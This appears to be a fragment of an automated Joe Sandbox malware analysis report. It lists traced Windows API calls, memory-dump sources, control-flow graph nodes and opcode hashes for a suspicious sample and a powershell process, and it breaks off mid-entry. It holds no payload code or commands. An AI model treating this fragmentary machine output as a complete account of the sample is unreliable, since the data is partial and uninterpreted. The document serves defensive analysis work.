                                                                    • Source File: 00000003.00000002.4572476188.0000000003100000.00000040.00000800.00020000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_3100000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID:
                                                                    • API String ID: 2559412058-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,058B44C2), ref: 058B45AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0669E45A,00000000,00000000,043840F8,03328010), ref: 0669E8A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek
                                                                    • String ID:
                                                                    • API String ID: 2222842502-0
                                                                    APIs
                                                                    • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,058B44C2), ref: 058B45AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4586654532.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_58b0000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: GlobalMemoryStatus
                                                                    • String ID:
                                                                    • API String ID: 1890195054-0
                                                                    APIs
                                                                    • PeekMessageW.USER32(?,?,00000000,00000000,00000000,?,?,?,?,0669E45A,00000000,00000000,043840F8,03328010), ref: 0669E8A8
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: MessagePeek
                                                                    • String ID:
                                                                    • API String ID: 2222842502-0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 06696D9E
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4588686045.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_6690000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4568836061.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_176d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4568836061.000000000176D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0176D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_176d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.4569058115.000000000177D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0177D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_177d000_THITWNSEI24112908089786756456545346568789-00010.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:

                                                                    Execution Graph

                                                                    Execution Coverage:5.9%
                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:3
                                                                    Total number of Limit Nodes:0

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SU6n^$cU6n^$sU6n^$\6n^
                                                                    • API String ID: 0-3022220743

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: SU6n^$cU6n^$sU6n^$\6n^
                                                                    • API String ID: 0-3022220743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2230685913.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7830000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: piRk$piRk$piRk$piRk$piRk$|,Tk
                                                                    • API String ID: 0-884015819

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • SetThreadToken.KERNELBASE(?,?), ref: 08BD6A12
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2233518129.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: ddd37ebd9e617615f1bab483772106b93c301f590883f290e335797ea185a1b7
                                                                    • Instruction ID: d6f3ca7f7234365b7095658daa2b70beeb0214545783d7d0609b711fd13b4f27
                                                                    • Opcode Fuzzy Hash: ddd37ebd9e617615f1bab483772106b93c301f590883f290e335797ea185a1b7
                                                                    • Instruction Fuzzy Hash: 4521AEB6904389CFCB11CF69C8847DEBFF4EF59220F25849AD098A7251D6789945CBA0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 348 8bd69b0-8bd6a1f SetThreadToken 350 8bd6a28-8bd6a45 348->350 351 8bd6a21-8bd6a27 348->351 351->350
                                                                    APIs
                                                                    • SetThreadToken.KERNELBASE(?,?), ref: 08BD6A12
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2233518129.0000000008BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_8bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID: ThreadToken
                                                                    • String ID:
                                                                    • API String ID: 3254676861-0
                                                                    • Opcode ID: 20cf6d07c71cadd03a39f6311b502b6a541a2f833bb50960dccad51b9be79b9d
                                                                    • Instruction ID: e646a07577a8f0f1a95c67b4d9e5751b76e9cce6f2a9b0a416cd3c2da92a0d5c
                                                                    • Opcode Fuzzy Hash: 20cf6d07c71cadd03a39f6311b502b6a541a2f833bb50960dccad51b9be79b9d
                                                                    • Instruction Fuzzy Hash: 281125B59007098FCB10CF9AC884BDEFBF8EB48320F24845AD518A7310D7B8A944CFA0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 354 7833ce8-7833d0d 355 7833d13-7833d18 354->355 356 7833f00-7833f1e 354->356 357 7833d30-7833d34 355->357 358 7833d1a-7833d20 355->358 364 7833f20-7833f23 356->364 365 7833f28-7833f4a 356->365 362 7833eb0-7833eba 357->362 363 7833d3a-7833d3c 357->363 360 7833d22 358->360 361 7833d24-7833d2e 358->361 360->357 361->357 366 7833ec8-7833ece 362->366 367 7833ebc-7833ec5 362->367 368 7833d3e-7833d4a 363->368 369 7833d4c 363->369 364->365 370 7833f50-7833f55 365->370 371 78340ce-78340e6 365->371 372 7833ed0-7833ed2 366->372 373 7833ed4-7833ee0 366->373 375 7833d4e-7833d50 368->375 369->375 376 7833f57-7833f5d 370->376 377 7833f6d-7833f71 370->377 387 78340f0-7834112 371->387 388 78340e8-78340ee 371->388 378 7833ee2-7833efd 372->378 373->378 375->362 379 7833d56-7833d75 375->379 380 7833f61-7833f6b 376->380 381 7833f5f 376->381 384 7834080-783408a 377->384 385 7833f77-7833f79 377->385 409 7833d77-7833d83 379->409 410 7833d85 379->410 380->377 381->377 389 7834097-783409d 384->389 390 783408c-7834094 384->390 391 7833f7b-7833f87 385->391 392 7833f89 385->392 395 7834228-783424c 387->395 396 7834118-783411d 387->396 388->387 398 78340a3-78340af 389->398 399 783409f-78340a1 389->399 397 7833f8b-7833f8d 391->397 392->397 419 78341db-78341e4 395->419 420 783424e-783425d 395->420 401 7834135-7834139 396->401 402 783411f-7834125 396->402 397->384 404 7833f93-7833fb2 397->404 405 78340b1-78340cb 398->405 399->405 407 78341da 401->407 408 783413f-7834141 401->408 412 7834127 402->412 413 7834129-7834133 402->413 436 7833fc2 404->436 437 7833fb4-7833fc0 404->437 407->419 415 7834143-783414f 408->415 416 7834151 408->416 418 7833d87-7833d89 409->418 410->418 412->401 413->401 422 7834153-7834155 415->422 416->422 418->362 423 7833d8f-7833d96 418->423 426 78341f1-78341f7 419->426 427 78341e6-78341ee 419->427 424 783428b-7834295 420->424 425 783425f-7834281 420->425 422->407 430 783415b-783415d 422->430 423->356 431 7833d9c-7833da1 423->431 434 7834297-783429c 424->434 435 783429f-78342a5 424->435 464 7834283-7834288 425->464 465 78342d5-78342fe 425->465 432 78341f9-78341fb 426->432 433 78341fd-7834209 426->433 438 7834177-783417e 430->438 439 783415f-7834165 430->439 440 7833da3-7833da9 431->440 441 7833db9-7833dc8 431->441 443 783420b-7834225 432->443 433->443 444 78342a7-78342a9 435->444 445 78342ab-78342b7 435->445 447 7833fc4-7833fc6 436->447 437->447 453 7834180-7834186 438->453 454 7834196-78341d7 438->454 448 7834167 439->448 449 7834169-7834175 439->449 450 7833dab 440->450 451 7833dad-7833db7 440->451 441->362 468 7833dce-7833dec 441->468 446 78342b9-78342d2 444->446 445->446 447->384 460 7833fcc-7834003 447->460 448->438 449->438 450->441 451->441 456 783418a-7834194 453->456 457 7834188 453->457 456->454 457->454 482 7834005-783400b 460->482 483 783401d-7834024 460->483 480 7834300-7834326 465->480 481 783432d-783435c 465->481 468->362 478 7833df2-7833e17 468->478 478->362 501 7833e1d-7833e24 478->501 480->481 493 7834395-783439f 481->493 494 783435e-783437b 481->494 488 783400f-783401b 482->488 489 783400d 482->489 485 7834026-783402c 483->485 486 783403c-783407d 483->486 491 7834030-783403a 485->491 492 783402e 485->492 488->483 489->483 491->486 492->486 499 78343a1-78343a5 493->499 500 78343a8-78343ae 493->500 508 78343e5-78343ea 494->508 509 783437d-783438f 494->509 504 78343b0-78343b2 500->504 505 78343b4-78343c0 500->505 506 7833e26-7833e41 501->506 507 7833e6a-7833e9d 501->507 510 78343c2-78343e2 504->510 505->510 516 7833e43-7833e49 506->516 517 7833e5b-7833e5f 506->517 525 7833ea4-7833ead 507->525 508->509 509->493 519 7833e4b 516->519 520 7833e4d-7833e59 516->520 522 7833e66-7833e68 517->522 519->517 520->517 522->525
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2230685913.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7830000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 292260c6dfc7b891c4641ea33fe00c51bd08c51437bb6900361c7954e6db8818
                                                                    • Instruction ID: 31478aedb90a0c21ccfbe8a3904e6f60d20c89fe5b4e57e8c647178a6847b2b8
                                                                    • Opcode Fuzzy Hash: 292260c6dfc7b891c4641ea33fe00c51bd08c51437bb6900361c7954e6db8818
                                                                    • Instruction Fuzzy Hash: 671268B1B04246DFDB258FACC81077ABBA29FE1214F14846AD509CF752DB36D846C7E1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 714 78317b8-78317da 715 78317e0-78317e5 714->715 716 7831969-78319b5 714->716 717 78317e7-78317ed 715->717 718 78317fd-7831801 715->718 724 7831b04-7831b22 716->724 725 78319bb-78319c0 716->725 719 78317f1-78317fb 717->719 720 78317ef 717->720 722 7831807-783180b 718->722 723 7831914-783191e 718->723 719->718 720->718 726 783184b 722->726 727 783180d-783181e 722->727 728 7831920-7831929 723->728 729 783192c-7831932 723->729 746 7831b24-7831b29 724->746 747 7831b2b-7831b34 724->747 730 78319c2-78319c8 725->730 731 78319d8-78319dc 725->731 732 783184d-783184f 726->732 727->716 744 7831824-7831829 727->744 733 7831934-7831936 729->733 734 7831938-7831944 729->734 736 78319ca 730->736 737 78319cc-78319d6 730->737 741 78319e2-78319e4 731->741 742 7831ab4-7831abe 731->742 732->723 743 7831855-7831859 732->743 739 7831946-7831966 733->739 734->739 736->731 737->731 748 78319e6-78319f2 741->748 749 78319f4 741->749 750 7831ac0-7831ac9 742->750 751 7831acc-7831ad2 742->751 743->723 752 783185f-7831863 743->752 754 7831841-7831849 744->754 755 783182b-7831831 744->755 746->747 756 7831b36-7831b42 747->756 757 7831b44 747->757 758 78319f6-78319f8 748->758 749->758 760 7831ad4-7831ad6 751->760 761 7831ad8-7831ae4 751->761 762 7831886 752->762 763 7831865-783186e 752->763 754->732 766 7831833 755->766 767 7831835-783183f 755->767 768 7831b46-7831b48 756->768 757->768 758->742 769 78319fe-7831a16 758->769 771 7831ae6-7831b01 760->771 761->771 770 7831889-7831911 762->770 764 7831870-7831873 763->764 765 7831875-7831882 763->765 773 7831884 764->773 765->773 766->754 767->754 774 7831b4a-7831b50 768->774 775 7831b7c-7831b86 768->775 786 7831a30-7831a34 769->786 787 7831a18-7831a1e 769->787 773->770 777 7831b52-7831b54 774->777 778 7831b5e-7831b79 774->778 783 7831b90-7831b96 775->783 784 7831b88-7831b8d 775->784 777->778 788 7831b98-7831b9a 783->788 789 7831b9c-7831ba8 783->789 797 7831a3a-7831a41 786->797 790 7831a22-7831a2e 787->790 791 7831a20 787->791 795 7831baa-7831bc1 788->795 789->795 790->786 791->786 800 7831a43-7831a46 797->800 801 7831a48-7831aa5 797->801 803 7831aaa-7831ab1 800->803 801->803
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2230685913.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7830000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 21151079eb629e552da34e4ab6d932e0997d5d0890794900689c735684645056
                                                                    • Instruction ID: 1cd85a448726dab74b794cecd72aaa115d1d111a278fb416422d613be9e2538f
                                                                    • Opcode Fuzzy Hash: 21151079eb629e552da34e4ab6d932e0997d5d0890794900689c735684645056
                                                                    • Instruction Fuzzy Hash: 07B113B1F0060EDFCB149EADC4087AABBE6AFD5625F18847AD905CB242DB31D845C7E1

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 859 4bdcec0-4bdcefd 860 4bdceff 859->860 861 4bdcf09-4bdcfd5 859->861 860->861 875 4bdcfdc-4bdd026 861->875 882 4bdd028-4bdd038 875->882 883 4bdd03a 875->883 884 4bdd03f-4bdd041 882->884 883->884 885 4bdd054-4bdd06c 884->885 886 4bdd043-4bdd04c 884->886 888 4bdd06e-4bdd07e 885->888 889 4bdd080 885->889 886->885 890 4bdd086-4bdd0fb 888->890 889->890 902 4bdd0fd 890->902 903 4bdd107-4bdd11c 890->903 902->903 905 4bdd11e 903->905 906 4bdd123-4bdd147 903->906 905->906 909 4bdd149-4bdd155 906->909 910 4bdd157 906->910 911 4bdd159-4bdd19d 909->911 910->911 918 4bdd19f 911->918 919 4bdd1a7 911->919 918->919 920 4bdd1a8 919->920 920->920
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36fb2056c215db38eb188f9f931958d87e34a73ecc3d6851e6ec1c987d9bf7ed
                                                                    • Instruction ID: fac7bb59087feeec181ac6001746cadcbf7c4ece0f35f895224d1bf5314dce2a
                                                                    • Opcode Fuzzy Hash: 36fb2056c215db38eb188f9f931958d87e34a73ecc3d6851e6ec1c987d9bf7ed
                                                                    • Instruction Fuzzy Hash: A6813834B002058FDB09DF68C494BAE7BF2EF88304F1595A8D145AF365EBB5AD49CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 812 4bd29f0-4bd2a1e 813 4bd2af5-4bd2b37 812->813 814 4bd2a24-4bd2a3a 812->814 818 4bd2b3d-4bd2b56 813->818 819 4bd2c51-4bd2c61 813->819 815 4bd2a3c 814->815 816 4bd2a3f-4bd2a52 814->816 815->816 816->813 823 4bd2a58-4bd2a65 816->823 821 4bd2b58 818->821 822 4bd2b5b-4bd2b69 818->822 821->822 822->819 829 4bd2b6f-4bd2b79 822->829 824 4bd2a6a-4bd2a7c 823->824 825 4bd2a67 823->825 824->813 830 4bd2a7e-4bd2a88 824->830 825->824 831 4bd2b7b-4bd2b7d 829->831 832 4bd2b87-4bd2b94 829->832 833 4bd2a8a-4bd2a8c 830->833 834 4bd2a96-4bd2aa6 830->834 831->832 832->819 835 4bd2b9a-4bd2baa 832->835 833->834 834->813 836 4bd2aa8-4bd2ab2 834->836 837 4bd2bac 835->837 838 4bd2baf-4bd2bbd 835->838 839 4bd2ab4-4bd2ab6 836->839 840 4bd2ac0-4bd2af4 836->840 837->838 838->819 843 4bd2bc3-4bd2bd3 838->843 839->840 844 4bd2bd8-4bd2be5 843->844 845 4bd2bd5 843->845 844->819 848 4bd2be7-4bd2bf7 844->848 845->844 849 4bd2bfc-4bd2c08 848->849 850 4bd2bf9 848->850 849->819 853 4bd2c0a-4bd2c24 849->853 850->849 854 4bd2c29 853->854 855 4bd2c26 853->855 856 4bd2c2e-4bd2c38 854->856 855->854 857 4bd2c3d-4bd2c50 856->857
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b75cd72b6e5a75e6df38f2abb62e9442cc24f64ef2d76da1c6c86cb045bf96b
                                                                    • Instruction ID: 42e4da912c092674966ebf925e896475c02e23759613700c76ef7ccc2baf5467
                                                                    • Opcode Fuzzy Hash: 6b75cd72b6e5a75e6df38f2abb62e9442cc24f64ef2d76da1c6c86cb045bf96b
                                                                    • Instruction Fuzzy Hash: 03916874A00645CFCB19CF59C494AAEBBB1FF88310B2486A9D915AB365D735FC42CBA0

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 921 4bdced0-4bdcefd 922 4bdceff 921->922 923 4bdcf09-4bdcfd5 921->923 922->923 937 4bdcfdc-4bdd026 923->937 944 4bdd028-4bdd038 937->944 945 4bdd03a 937->945 946 4bdd03f-4bdd041 944->946 945->946 947 4bdd054-4bdd06c 946->947 948 4bdd043-4bdd04c 946->948 950 4bdd06e-4bdd07e 947->950 951 4bdd080 947->951 948->947 952 4bdd086-4bdd0fb 950->952 951->952 964 4bdd0fd 952->964 965 4bdd107-4bdd11c 952->965 964->965 967 4bdd11e 965->967 968 4bdd123-4bdd147 965->968 967->968 971 4bdd149-4bdd155 968->971 972 4bdd157 968->972 973 4bdd159-4bdd19d 971->973 972->973 980 4bdd19f 973->980 981 4bdd1a7 973->981 980->981 982 4bdd1a8 981->982 982->982
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d1a4dbac0206e4374bc15d96f9353fb43ed6d834124c68cf89a6b5876dd13f0b
                                                                    • Instruction ID: 0bb3ba5d2817ad51155fb52dc78247b44ee8396047803b7e9497162165e9f741
                                                                    • Opcode Fuzzy Hash: d1a4dbac0206e4374bc15d96f9353fb43ed6d834124c68cf89a6b5876dd13f0b
                                                                    • Instruction Fuzzy Hash: E7812834B002058FDB09DF68C490B9E7BF6EF88304F1595A8D245AF365EB75AC45CB90

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1119 4bd7740-4bd7776 1122 4bd777f-4bd7788 1119->1122 1123 4bd7778-4bd777a 1119->1123 1126 4bd778a-4bd778c 1122->1126 1127 4bd7791-4bd77af 1122->1127 1124 4bd7829-4bd782e 1123->1124 1126->1124 1130 4bd77b5-4bd77b9 1127->1130 1131 4bd77b1-4bd77b3 1127->1131 1132 4bd77c8-4bd77cf 1130->1132 1133 4bd77bb-4bd77c0 1130->1133 1131->1124 1134 4bd782f-4bd7860 1132->1134 1135 4bd77d1-4bd77fa 1132->1135 1133->1132 1145 4bd7866-4bd78bd 1134->1145 1146 4bd78e2-4bd78e6 1134->1146 1138 4bd77fc-4bd7806 1135->1138 1139 4bd7808 1135->1139 1141 4bd780a-4bd7816 1138->1141 1139->1141 1147 4bd781c-4bd7823 1141->1147 1148 4bd7818-4bd781a 1141->1148 1155 4bd78bf 1145->1155 1156 4bd78c9-4bd78d7 1145->1156 1159 4bd78e9 call 4bd7938 1146->1159 1160 4bd78e9 call 4bd7940 1146->1160 1147->1124 1148->1124 1150 4bd78ec-4bd78f1 1155->1156 1156->1146 1158 4bd78d9-4bd78e1 1156->1158 1159->1150 1160->1150
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a1e29405e5a234ce5043bd58f07c59560b94c8d535e0cd9690251cd296db17b4
                                                                    • Instruction ID: 657f32ab940ce52987d0529fa45ff9257da38e499053c4c94fba622333d535de
                                                                    • Opcode Fuzzy Hash: a1e29405e5a234ce5043bd58f07c59560b94c8d535e0cd9690251cd296db17b4
                                                                    • Instruction Fuzzy Hash: 6A51A1347042059FD705DBA9D844AAA7BE6FFC9214B1544FAD509CB352EF72EC01CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4d14632d676b7f9be08130a511a6bc060a0eba32c90f2cf905ebaa2de93ed85b
                                                                    • Instruction ID: 9b8b633c9d73a16be7d7e1c359ec7753b7509b7211c8aaf5c48372dae156eb36
                                                                    • Opcode Fuzzy Hash: 4d14632d676b7f9be08130a511a6bc060a0eba32c90f2cf905ebaa2de93ed85b
                                                                    • Instruction Fuzzy Hash: C6611571E01208CFDB14DFA9D584A9DBBF1FF88310F1981AAE519AB254EB70AC45CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a89a9adce33702b4f57f2741cc57771da922ff75ec452ddf599c241eefd55b46
                                                                    • Instruction ID: 794ecfc4b9c0f0ea65199b2d9632f0a9cdcae38638f20fead24a0372bbce3dd5
                                                                    • Opcode Fuzzy Hash: a89a9adce33702b4f57f2741cc57771da922ff75ec452ddf599c241eefd55b46
                                                                    • Instruction Fuzzy Hash: 41512871E01208CFDB14CFA9D584A9DBFF1FF88310F1981A9E819AB354EB70A845CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2151b214eb2ed7d01d2984cd370f93d88bf8da2aa488269e8fcb4ecc7273f8a6
                                                                    • Instruction ID: e87dfc5e93e9010fdbc372f140c764a521e24de27a20d8f42e10a7471a41f2b8
                                                                    • Opcode Fuzzy Hash: 2151b214eb2ed7d01d2984cd370f93d88bf8da2aa488269e8fcb4ecc7273f8a6
                                                                    • Instruction Fuzzy Hash: B8410834B142058FDB19DFA8C458AAABBF2EF8D715F1480A9D502AB391DF35EC01CB61
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2230685913.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_7830000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6391d4b75467e0874b9ff4c8e667f7659ca1a7c1dbb5fa1ef812bbdff2777c1d
                                                                    • Instruction ID: ef0364a4a8a02155b733e32697e7e8d952bea21e21207486ea4e8e1f9f6ff53a
                                                                    • Opcode Fuzzy Hash: 6391d4b75467e0874b9ff4c8e667f7659ca1a7c1dbb5fa1ef812bbdff2777c1d
                                                                    • Instruction Fuzzy Hash: E031E2F0B00202DBDB248E5CC60476ABBA29FE4644F1485A5E904DFF51DB35EC49C7E1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2214867012.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_4bd0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7b50bf5e5db11d07696c675748f2f9b1ff7ade49e51fc95ab8a5b1b92d67ffaa
                                                                    • Instruction ID: 0ddec6889ee8e8b90cfa36c1ebfd9d4e751aff3748ccb3f82f0c4315b600637f
